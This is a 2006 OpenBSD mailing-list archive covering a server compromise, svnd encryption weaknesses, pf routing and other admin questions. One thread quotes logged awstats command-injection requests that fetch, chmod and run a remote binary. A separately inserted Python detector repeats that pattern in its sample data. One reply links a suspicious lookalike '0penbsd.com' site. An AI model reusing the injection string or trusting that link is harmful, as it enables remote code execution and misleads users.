pci1 at ppb0 bus 1
pcib0 at pci0 dev 7 function 0 Intel 82371AB PIIX4 ISA rev 0x02
pciide0 at pci0 dev 7 function 1 Intel 82371AB IDE rev 0x01: DMA,  
channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: ST380011A
wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd1 at pciide0 channel 0 drive 1: IBM-DPTA-372050
wd1: 16-sector PIO, LBA, 19574MB, 40088160 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
wd1(pciide0:0:1): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
uhci0 at pci0 dev 7 function 2 Intel 82371AB USB rev 0x01: apic 2  
int 19 (irq 11)
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
Intel 82371AB Power Mgmt rev 0x02 at pci0 dev 7 function 3 not  
configured
vga1 at pci0 dev 17 function 0 ATI Mach64 GP rev 0x5c
wsdisplay0 at vga1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
xl0 at pci0 dev 18 function 0 3Com 3c905B 100Base-TX rev 0x30: apic  
2 int 18 (irq 9), address 00:50:04:6a:2f:19
exphy0 at xl0 phy 24: 3Com internal media interface
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pcppi0 at isa0 port 0x61
midi0 at pcppi0: PC speaker
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
lm0 at isa0 port 0x290/8: LM79
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask 0 netmask 0 ttymask 0
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
dkcsum: wd0 matched BIOS disk 80
dkcsum: wd1 matched BIOS disk 81
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
WARNING: / was not properly unmounted
apm0: disconnected

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/



Re: learning to code - suggestions needed

2006-01-04 Thread Luís Bruno

Kim Onnel wrote:

I just dont understand what ur saying


Damn, sorry about that.

 - FWIW means for what (little) it's worth :-)
 - knf is a manpage; actually, I think it's called style in section 9.
 - c.l.c. is a usenet group; the comp.lang.c FAQ has lots of tips and 
tricks which I think are very useful.


And I did start with K&R; a great book. Which *also* isn't required 
reading; my teacher actually recommended Herb's book.


--
Luis Bruno



Re: How did they get here?

2006-01-04 Thread Joachim Schipper
On Wed, Jan 04, 2006 at 04:07:21PM +, Gaby vanhegan wrote:
 On 4 Jan 2006, at 15:51, Pete Vickers wrote:
  Is there some attack vector like php or such available on the  
  machine ? maybe they used that to retrieve  write the file?
 
 The messages in the log file indicate that they used some command  
 injection in a script to call wget and download the files into /tmp.   
 I'm fairly sure it was via a bad script, and I'm trying to locate  
 which script was used, so far with no success.

There was a phpBB2 in one of the paths used. If you have phpBB enabled
somewhere, that's a likely attack vector.

Joachim



Re: How did they get here?

2006-01-04 Thread Bryan Irvine
  To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
  i386.
 
  I have some suspect files in /tmp, and I'm fairly sure that they
  shouldn't be there.  Only thing I can't twig is what method the
  attackers used to get the files into that directory.  The files are:

 Is this doing any A/V scanning? You have told us nothing about the host in
 question: is it an email gateway? DNS server? etc.

I'd suspect it has something more to do with an easy-to-guess password.

--Bryan



Re: CGD

2006-01-04 Thread Ted Unangst
On 1/4/06, knitti [EMAIL PROTECTED] wrote:
  this is really not that useful.  why would you pick anything other
  than the best when setting it up?

 because no one knows what the best is. blowfish appears to be the best
 at the moment, because it's secure and fast. some other people don't like
 block sizes of 64 bit. so perhaps they take aes, which is slightly slower
 but encrypts blocks of 128 bit. is it for no reason, that swap encryption
 uses aes over blowfish?

aes has faster key setup, which is important for swap but not for
svnd.  the cvs changelog says as much.  swap encryption started out
using blowfish as well.



Re: How did they get here?

2006-01-04 Thread Craig Skinner
On Wed, Jan 04, 2006 at 05:28:38PM +0100, Joachim Schipper wrote:
 There was a phpBB2 in one of the paths used. If you have phpBB enabled
 somewhere, that's a likely attack vector.
 

I noticed that too. phpBB has been used for many sorts of tricks.

The ISP that I work for scans for it and support follow a procedure to
warn the customer that it has been disabled. (chmod)

An easy way is to change:

AddType application/x-httpd-php .php

to:

AddType application/x-httpd-php .phtml

Most php packages come with .php files, and people that use them usually
don't have the nous to alter all the files and links throughout the
package.

Craig.



Re: CGD

2006-01-04 Thread Ted Unangst
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:

 aes has faster key setup, which is important for swap but not for
 svnd.  the cvs changelog says as much.  swap encryption started out
 using blowfish as well.

i also should have pointed out that swap was converted to using
rijndael, not aes, since aes did not exist at the time the conversion
was made.



Re: CGD

2006-01-04 Thread Ted Unangst
On 1/4/06, Karl O. Pinc [EMAIL PROTECTED] wrote:
 another point of my post was to indicate that yes, tedu is right
 in that most people _won't_ run CGD (or svnd) but people _still_
 appreciate having the option open.  I, like IMO a lot of
 people, have only enough interest to kibbutz in the hope
 of slowly collecting enough information to make an informed
 choice should the time come to exercise the option.

this is a good idea.  the first thing you need to do is identify your
threat model.  can you write it down?  and if it starts with somebody
stealing, you lose.  amidst all the yammering, i think people are
just assuming that encrypting their data makes it safe.  but if you
can't even say what the danger is, how can you know it's safe?



Re: biosboot broken?

2006-01-04 Thread M. Schatzl
Uwe Dippel wrote:
 On Mon, 02 Jan 2006 14:06:52 +0100, M. Schatzl wrote:
 
 
Now that I switched to a 60G disk (cloned the other 2 partitions and the
Windows bootsector, then installed OpenBSD anew from the same
floppy/mirror as before), OpenBSD won't boot any more, except when I run
the boot-floppy and boot explicitly with wd0a:/bsd


OK, I finally found the error. This is the partition table:


Disk: wd0       geometry: 5168/240/63 [78140160 Sectors]
Offset: 0       Signature: 0xAA55
         Starting       Ending       LBA Info:
 #: id    C   H  S -    C   H  S [       start:        size ]

 0: 07    0   1  1 -  948 239 63 [          63:    14348817 ] HPFS/QNX/AUX
 1: 12 7189   0  1 - 7751 239 63 [   108697680:     8512560 ] Compaq Diag.
*2: A6  949   0  1 - 7000 239 63 [    14348880:    91506240 ] OpenBSD
 3: 00    0   0  0 -    0   0  0 [           0:           0 ] unused


This is the layout:

NTFS - OpenBSD - unused - Compaq



Partitions #0 and #1 as well as the MBR were already transferred before
the installation of OpenBSD (via the installer). At the disk-setup
stage, I let drop myself into fdisk. Now I created the A6 partition on
unused space and proceeded,

the first time leaving the boot flag on #0:
^^^

The NTFS and Compaq(FAT16) partitions showed up as i and j in the
disklabel-editor.

I had to calculate the new offsets for my partitions myself because it
always remained on the initial value (which was correct for wd0a).

Installing biosboot via /usr/mdec/installboot -v /boot
/usr/mdec/biosboot wd0 was of exactly no use. When I set the boot flag
to #2 later on, it still didn't work. The BIOS always responded with No
OS found-messages, though I could start OpenBSD then with a bootfloppy.

Apparently there was no damage done to the MBR, because Windows booted
without problems.


the second time with setting the flag to #2:


There are no partitions visible except wd0a and wd0c.

Offsets cumulated themselves every a X

Installing the BIOS was successful and it also booted the kernel after a
reboot.



In the second case it behaved as expected.

Obviously, the fact of setting the active partition affects the
installation. But shouldn't the flag be just meaningful on boot, to tell
the BIOS where to hook in? Maybe my assumptions/expectations are wrong,
but I suspected the installer only to honor the partition ID.

I don't know if this is an installer bug; I'm certainly not really
hellbent to reproduce it, but I could as long as I got that old disk (1
more week).

So let me know.

All the best,
/Markus



Re: Blowfish still good enough?

2006-01-04 Thread Tobias Weingartner
On Wednesday, January 4, Andreas Bartelt wrote:
 
 In my personal opinion, I think, the weakest link is entering the 
 password when opening a svnd device. Are there already solutions known 
 which combine passwords (knowledge) with hardware devices (i.e. 
 smartcards) or biometrics in order to access some secure storage? I 
 don't own one, but don't at least a couple of newer IBM notebook models 
 have a fingerprint reader and a TPM built in? Do you think a combination 
 of these measures would improve overall security?

Sure, if you can get me the datasheet/etc, I'll see about possibly
writing a driver for the fingerprint reader.  I've contacted the
company that makes them, and they refused to even talk to me.  Maybe
you have better luck.

Otherwise, it's all talk...

--Toby.



Re: How did they get here?

2006-01-04 Thread Gaby vanhegan
On 4 Jan 2006, at 16:28, Joachim Schipper wrote:

 The messages in the log file indicate that they used some command
 injection in a script to call wget and download the files into /tmp.
 I'm fairly sure it was via a bad script, and I'm trying to locate
 which script was used, so far with no success.

 There was a phpBB2 in one of the paths used. If you have phpBB enabled
 somewhere, that's a likely attack vector.

That was one of the locations that the linuxday worm was being  
downloaded from by the wget request.

On 4 Jan 2006, at 16:35, Bryan Irvine wrote:

 I'd suspect it has something more to do with an easy-to-guess  
 password.

Even if the wget entries in the /var/www/logs/error_log correspond to  
the times and dates of the files in /tmp?

bash-3.00# ls -lFa /tmp
total 68
drwxrwxrwt   2 root  wheel    512 Jan  4 18:10 ./
drwxr-xr-x  22 root  wheel    512 Jun 29  2005 ../
-rw-r--r--   1 www   wheel   3355 Jan  2 04:14 .cpanel
-rw-r--r--   1 www   wheel  18695 Jan  2 04:15 .cpanel.tmp
-rw-r--r--   1 www   wheel      0 Jan  2 05:28 .plesk

Some other suspect entries are these:

61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404 308

Even though we don't have awstats installed anywhere (hence the  
404).  There are many 404 errors for this script.

bash-3.00# locate awstats.pl
bash-3.00#

It's just a bit frustrating.  Am I right in thinking that if the wget  
output is in /var/www/logs/error_log then it comes from a site that  
has no defined ErrorLog?  This is a limited number of sites, but I've  
found no log entries in the transfer logs for those sites that  
correspond with the times that wget was run.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
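A detector for the kind of access-log entries quoted in this post, added here as an example and not code from the thread: it parses Apache common-log lines, fully URL-decodes the query string, flags requests that combine shell metacharacters with fetch/exec commands regardless of HTTP status (a 404 on one path says nothing about the same probe against a path that does exist), and correlates hits with the mtimes of suspect files in /tmp. The log lines, file times and addresses below are constructed samples modelled on the post, not the original data.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed sample log, modelled on the awstats probes quoted in the post.
# 192.0.2.x and 198.51.100.7 are documentation addresses, not the real ones.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fpayload%3bchmod%20%2bx%20payload%3b%2e%2fpayload;echo%20YYY;echo| HTTP/1.1" 404 300
192.0.2.10 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fpayload%3bchmod%20%2bx%20payload%3b%2e%2fpayload;echo%20YYY;echo| HTTP/1.1" 404 300
192.0.2.22 - - [02/Jan/2006:07:20:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
192.0.2.22 - - [02/Jan/2006:07:20:09 +0000] "GET /search.php?q=cats|dogs HTTP/1.1" 200 2048
192.0.2.35 - - [02/Jan/2006:07:25:44 +0000] "GET /cgi-bin/awstats.pl?config=site1 HTTP/1.1" 404 290
"""

# Constructed mtimes of files found in /tmp (the real ls output is in the post).
SAMPLE_TMP_FILES = {
    ".cpanel": datetime(2006, 1, 2, 7, 19, 30, tzinfo=timezone.utc),   # minutes after the probes
    "notes.txt": datetime(2005, 12, 20, 9, 0, 0, tzinfo=timezone.utc),  # unrelated, much older
}
WINDOW = timedelta(minutes=5)   # how long before a file's mtime a request still counts

# Apache common log format: ip ident user [ts] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Shell metacharacters that have no business in a CGI query string, and the
# commands chained after them in the quoted probes. Both classes must be present.
META_RE = re.compile(r"[|;`]|\$\(")
CMD_RE = re.compile(r"\b(?:wget|curl|fetch|chmod|cd)\b|/tmp\b|\./")


def fully_decode(s: str) -> str:
    """Percent-decode until stable, so double-encoded payloads are caught too."""
    prev = None
    while prev != s:
        prev, s = s, unquote(s)
    return s


def parse_line(line: str):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    path, _, query = rec["url"].partition("?")
    rec["path"], rec["query"] = path, fully_decode(query)
    return rec


def scan(log_text: str) -> list:
    """Flag requests whose decoded query mixes metacharacters with commands.
    The HTTP status is deliberately ignored: a 404 is still an injection attempt."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        metas, cmds = META_RE.findall(rec["query"]), CMD_RE.findall(rec["query"])
        if metas and cmds:
            rec["indicators"] = sorted(set(metas) | set(cmds))
            hits.append(rec)
    return hits


def correlate(hits: list, tmp_files: dict, window: timedelta) -> dict:
    """For each suspect file, list the flagged requests made within `window`
    before its mtime: {filename: [(ip, path, status), ...]}."""
    out = {}
    for name, mtime in tmp_files.items():
        out[name] = [(h["ip"], h["path"], h["status"]) for h in hits
                     if timedelta(0) <= mtime - h["ts"] <= window]
    return out


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["ip"], h["path"], h["status"], h["indicators"])
    for name, reqs in correlate(found, SAMPLE_TMP_FILES, WINDOW).items():
        print(name, "<-", reqs)
```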



Re: DadOS - sys shutdown with XDM

2006-01-04 Thread Jared Solomon
Feh, just have a read-only / with a read/write /home.  Then just tell
Dad to pull the plug when he's finished.

FWIW he, and you, will probably go back to windows right quick with
that solution.



Re: learning to code - suggestions needed

2006-01-04 Thread ed
On Tue, 03 Jan 2006 14:35:12 -0800
Joe S [EMAIL PROTECTED] wrote:

 Do you have any recommendations on how I should get started?
 * Community college courses?
 * College courses?

Always helpful, if you're not in full time employment.

 * Self-study books?

Probably the best source of information. Choose UNIX environment
programming books, they're the most informative. I like this one
currently: http://www.amazon.co.uk/exec/obidos/ASIN/0131411543, covers
lots, probably not much good to a beginner, so if it's C you're
interested in, try this:
http://www.amazon.co.uk/exec/obidos/ASIN/0393969452

College courses can be a bit useless unless they cover what you really
want to know. Otherwise you will spend three years on a degree course to
just learn to code, and that sounds like a waste of time to me. If you
want to learn programming, spend 30 mins on the loo with a good book in
your hands, it's worth 10 hours in the class room (added geek points if
you have a wireless network and it's the pdf).

-- 
Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net 
:%s/Open Source/Free Software/g



Re: How did they get here?

2006-01-04 Thread Gaby vanhegan
On 4 Jan 2006, at 16:10, knitti wrote:

 I would think php, but this doesn't explain it unless you turned the
 chroot off.

Due to historical reasons, we're not running apache chrooted.  This  
is why they're in /tmp rather than /var/www/tmp, or any other place.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/



Re: How did they get here?

2006-01-04 Thread Spruell, Darren-Perot
From: Gaby vanhegan [mailto:[EMAIL PROTECTED]
  I would think php, but this doesn't explain it unless you turned the
  chroot off.
 
 Due to historical reasons, we're not running apache chrooted.  This  
 is why they're in /tmp rather than /var/www/tmp, or any other place.

Given the security posture of a system running PHP (and PHP apps with a poor
security history) in a non-chrooted environment, I'd agree that you've got a
pretty acute risk avenue staring you in the face.

DS



Re: How did they get here?

2006-01-04 Thread veins

Gaby vanhegan wrote:

 On 4 Jan 2006, at 16:10, knitti wrote:

  I would think php, but this doesn't explain it unless you turned the
  chroot off.

 Due to historical reasons, we're not running apache chrooted.  This
 is why they're in /tmp rather than /var/www/tmp, or any other place.

historical ?



system processes

2006-01-04 Thread Dmitij Lebed

How can I make it so that non-root (or non-wheel) users cannot view the
processes of other users?



Re: How did they get here?

2006-01-04 Thread Gaby vanhegan
On 4 Feb 2006, at 20:38, veins wrote:

 I would think php, but this doesn't explain it unless you turned the
 chroot off.

 Due to historical reasons, we're not running apache chrooted.   
 This  is why they're in /tmp rather than /var/www/tmp, or any  
 other place.

 historical ?

There are sites on this machine that we've had since 2000, and that  
were running on various insecure os' from there before we made the  
move to OpenBSD.  I suspect that it would be a medium/large sized  
task to make these sites work under chroot, as well as reorganise the  
user home folders to fit in with this.

On the other hand, getting my server pwn3d (again) is even more of a  
ballache.  Time to book in some configuration time...

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/



Re: system processes

2006-01-04 Thread Marcin Wilk

Hi
Zophie can help You with that:
http://www.0penbsd.com/zophie.html

Best Regards

At 21:59 2006-01-04, you wrote:

How can I make it so that non-root (or non-wheel) users cannot view the
processes of other users?




problem with packet filter

2006-01-04 Thread Mario Beltran
Hello, I have two openbsd 3.8 boxes with packet filter, carp interfaces 
and pfsync, like this:



LAN  


   --
   ||
   ||
   | hme3   |

   - hme1 [ OpenBSD0 ] hme0 ---  internet   |  internet
   |  hme2 |  |gw1  | gw2
|   |  |---  |
   |   |  | |
   |   | hme2 | |
   - hme1 [ OpenBSD1 ] hme0 --- |
   ||
   | hme3   |
   ||
   --

  
I do not use round robin to load balance because the machines on the LAN 
will never create connections... they will only respond to internet requests.
I want each box not to have a default gateway, because the packet will be 
returned via the interface it came in on.
And that works fine.


But I need to connect to anywhere from a specific public host, and only 
via internet gw1 (hme0), and that does not work, so I have created these rules in 
each box ($proxy is a macro with a public ip address and $gateway is 
the ip address of my gateway):


pass in quick on hme0 from $proxy to any tag PROXY keep state
pass out quick reply-to ( hme0 $gateway ) keep state tagged PROXY

For example, if I want to connect to the ssh port from $proxy to any hme0 
interface, I cannot. This is my tcpdump output:


# tcpdump -n -e -ttt -i hme0 host 200.13.161.68
tcpdump: listening on hme0, link-type EN10MB
Jan 04 11:37:41.242856 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243131 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243187 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243299 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243321 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)


Look... the packets come from the proxy ip address, but the ip address of 
my hme0 interface never replies to this request. The log of my packet filter 
shows me nothing about dropping or rejecting the response packet from the hme0 ip 
address.


Any suggestions will be much appreciated :)

Thanks in advance

Mario



High Load Averages

2006-01-04 Thread Mike Keller
Hello, I am running OBSD 3.8 as my monitoring / proxy
server.  I have been having issues with high load
averages (2-2.5) on Nagios (installed chroot by
packages).  If I run squid (installed from ports), the
load average goes up into the 6-7's.  CPU is 95% free,
Memory is 85-90% free, swap is unused (0K/2048M).  My
initial thought was that it was Nagios, but Squid (by
itself) is also running high load averages.  I have
other OBSD servers (mail gateways and such) that are
always less than 1.0 load average.  When I run vmstat,
there are usually between 3-7 blocked processes
(although I have seen as many as 22), and they are
constant (on every 5 second poll). Eventually (after a
few days), the process becomes unresponsive and I have
to reboot the server.  my vmstat -w 5 output is:

 procs    memory       page                    disks    traps          cpu
 r b w    avm     fre   flt  re  pi  po  fr  sr wd0 wd1  int   sys   cs us sy id
 0 4 0  88604 823596  1360   0   0   0   0   0   0   0  423  1628   44  1  1 98
 0 3 0  87764 824704  3679   0   0   0   0   0   0   0  417  4113   66  2  7 91
 0 4 0  88588 823588  1680   0   0   0   0   0   0   0  354  1705   46  1  2 98
 0 3 0  87760 824708  3913   0   0   0   0   0   0   0  310  3561   69  1  3 95
 0 3 0  87760 824712  2048   0   0   0   0   0   0   0  389  2388   44  1  6 93
 0 4 0  88556 823608  3881   0   0   0   0   0   0   0  444  3547   66  3  2 95
 2 3 0  89540 822048  1772   0   0   0   0   0   0   0  414  2721   41  1  8 91
 0 3 0  87760 824232  3712   0   0   0   0   0   0   0  381  3459   73  4  3 93
 0 3 0  87760 824712  1325   0   0   0   0   0   0   0  371  1291   39  1  1 98
 0 3 0  87760 824712  4655   0   0   0   0   0   0   0  391  4463   72  2  7 90
 0 3 0  87760 824716  1365   0   0   0   0   0   0   0  414  1381   43  0  2 98
 0 3 0  87764 824708  4140   0   0   0   0   0   0   0  396  4502   72  5  5 91
 0 3 0  87760 824716  1749   0   0   0   0   0   0   0  438  2109   48  1  3 96
 0 5 0  89208 822572  4202   0   0   0   0   0   0   0  433  3952   74  1  4 95
 0 3 0  87756 824720  1600   0   0   0   0   0   0   0  472  1597   57  1  2 97
 0 3 0  87756 824716  4334   0   0   0   0   0   0   0  426  4491   66  2  7 90
 0 3 0  87760 824708  1341   0   0   0   0   0   0   0  452  1291   37  1  2 97
 0 3 0  87760 824708  3874   0   0   0   0   0   0   0  450  4270   67  3  7 90
 0 3 0  87760 824712  1541   0   0   0   0   0   0   0  340  1477   40  1  1 98
 0 3 0  87760 824712  3884   0   0   0   0   0   0   0  406  3496   61  2  3 95
 0 4 0  88604 823588  1794   0   0   0   0   0   0   0  393  2239   54  2  5 93
 0 3 0  87756 824716  3657   0   0   0   0   0   0   0  422  3410   65  1  3 95
 0 3 0  87764 824708  1768   0   0   0   0   0   0   0  438  2125   50  1  3 96
 0 3 0  87760 824708  4066   0   0   0   0   0   0   0  455  3654   66  3  2 94
 0 4 0  88552 823608  1563   0   0   0   0   0   0   0  392  1519   40  1  1 98
 0 3 0  87760 824232  4077   0   0   0   0   0   0   0  430  4207   74  4  3 93
 0 3 0  87760 824708  1317   0   0   0   0   0   0   0  424  1280   39  1  1 98
 0 4 0  88568 823600  4233   0   0   0   0   0   0   0  460  4659   66  3  7 90
 0 3 0  87760 824712  1550   0   0   0   0   0   0   0  415  1507   45  1  1 98
 0 3 0  87760 824712  4105   0   0   0   0   0   0   0  419  3688   73  3  3 95
 0 4 0  88536 823636  8791   0   0   0   0   0   0   0  440 14787  229 21 13 66
 0 3 0  87724 824756  2200   0   0   0   0   0   0   0  278  2221   43  1  2 97
 0 3 0  87724 824752     8   0   0   0   0   0   0   0  321   103   17  0  0 100
 0 3 0  87724 824756   188   0   0   0   0   0   0   0  357   258   16  0  0 100
 0 3 0  87724 824752     7   0   0   0   0   0   0   0  356    90   13  0  0 100
 0 7 0  90592 820320  8643   0   0   0   0   0   0   0  514  9263  189  5 15 80
 0 3 0  87724 824756  1586   0   0   0   0   0   0   0  301  1597   58  1  1 98
 0 4 0  88508 823668  9378   0   0   0   0   0   0   0  374  8348  119  5  7 88
 0 4 0  88532 823640  1940   0   0   0   0   0   0   0  343  2299   55  1  6 93
15 15 0 189680 712732 19460   0   0   0   0   0   0   0  441 31721  238 33 14 54
 6 22 0 195568 706708 37552   0   0   0   0   0   0   0  575 73375  661 71 29  0
 0 6 0 106440 804032 32993   0   0   0   0   0   0   0  675 58724  663 49 29 22
 0 7 0 107268 802876  3371   0   0   0   0   0   0   0  417  4513   89  3  6 91
 0 7 0 107256 802408  7764   0   0   0   0   0   1   0  402  7988  131  8  9 83
 0 6 0 106436 804028  1831   0   0   0   0   0   0   0  390  2514   60  2  2 96
 0 5 0  89152 822584  5466   0   0   0   0   0   0   0  420  7000   89  6  5 90
 0 4 0  88532 823628  1899   0   0   0   0   0   0   0  444  2725   64  1  6 93
 0 3 0  87728 824700  3820   0   0   0   0   0   0   0  434  3614   85  3  2 95
 0 3 0  87724 824700  1557   0   0   0   0   0   0   0  395  1481   42  1  2 98
 0 4 0  88524 823600  4210   0   0   0   0   0   0   0  440  4218   67  2  7 90
 0 3 0  87724 824704  1577   0   0   0   0   0   0

Patches out, no errata page update ?

2006-01-04 Thread Allie Daneman
So...I see there are some new patches out but no errata page update ?

150 Have a Gorilla.
drwxr-xr-x2 1114 1114  512 Jan 03 13:03 .
drwxr-xr-x   18 1114 1114  512 Dec 30 21:03 ..
-r--r--r--1 1114 1114 7152 Jan 03 12:10 001_perl.patch
-r--r--r--1 1114 1114 3953 Dec 30 20:29 002_fd.patch
226 There, everyone likes a Gorilla.
ftp> pwd
257 /pub/OpenBSD/patches/3.8/common

-- 
Allie Daneman
Allnix,LLC.
http://www.allnix.net



Re: problem with packet filter

2006-01-04 Thread Stuart Henderson
On 2006/01/04 15:39, Mario Beltran wrote:
 I want that each box dont have a default gateway because it will be 
 depend of the interface that the packet come from will be returned it. 

Does adding a route to $proxy pointing to $gateway help..?



Re: CGD

2006-01-04 Thread knitti
warning! spoilers! openbsd svnd is not safe for general use.

On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
 this is good idea.  the first thing you need to do is identify your
 threat model.  can you write it down?  and if it starts with somebody
 stealing, you lose.  amidst all the yammering, i think people are
 just assuming that encrypting their data makes it safe.  but if you
 can't even say what the danger is, how can you know it's safe?

my threat model includes the following two cases. for both of them svnd
can't protect me really well

case 1)  let's say someone can predict some blocks in my encrypted data,
then she can find every block (64bit) everywhere within the container
with the same data. depending on the nature of the data, if some blocks
are known, more can be guessed. the license part of a source file is very
predictable. so if some software's source, which is no secret but its
possession illegal, can be proved to be on my disk without breaking my
key, this is bad. some illustration to prove that every block of the same data
encrypted with the same user-key is the same in every svnd0 in the world:

# dd if=/dev/zero of=/tmp/img0 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1067 bytes/sec)
# dd if=/dev/zero of=/tmp/img1 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1280 bytes/sec)
# vnconfig -ckv svnd0 /tmp/img0
Encryption key: test
svnd0: 1024 bytes on /tmp/img0
# vnconfig -ckv svnd1 /tmp/img1
Encryption key: test
svnd1: 1024 bytes on /tmp/img1
# dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (12190476 bytes/sec)
# dd if=/usr/share/misc/license.template of=/dev/rsvnd1c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1138 bytes/sec)
# vnconfig -u svnd0
# vnconfig -u svnd1
# cmp /tmp/img0 /tmp/img1
#
user key==encryption key==Bad Thing(TM)

case 2) data integrity. I don't want a person to be able to mess with my
data without knowing my key. the location of some data on my disk can be
determined, and this data can be replicated anywhere else on the disk, either
by insertion or by overwriting other data. illustration continued:

# dd if=/tmp/img0 of=/tmp/img3 skip=1 bs=128 count=1
1+0 records in
1+0 records out
128 bytes transferred in 0.000 secs (1488372 bytes/sec)
# cat /tmp/img3 /tmp/img3 /tmp/img3 /tmp/img3 > /tmp/img6
# vnconfig -ckv svnd0 /tmp/img6
Encryption key: test
svnd0: 512 bytes on /tmp/img6
# cat /dev/rsvnd0c
dx
  should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

If you add extra text#

classical replay attack. I seem to have screwed some block boundary,
but you get the general idea. a good implementation would've produced
garbage only.

thanks a lot for your attention.

--knitti



Re: problem with packet filter

2006-01-04 Thread Mario Beltran

Stuart Henderson wrote:

 On 2006/01/04 15:39, Mario Beltran wrote:

  I want that each box dont have a default gateway because it will be 
  depend of the interface that the packet come from will be returned it. 

 Does adding a route to $proxy pointing to $gateway help..?

Thank you Stuart for your response :)

Do you mean that I have to add a static route manually?

I don't want it this way; I want packet filter to do this.

I mean that route-to and reply-to commands were created for these 
situations... or am I wrong?


Regards

Mario.



Re: pf failover state problem

2006-01-04 Thread ed
On Thu, 29 Dec 2005 23:04:02 -0700
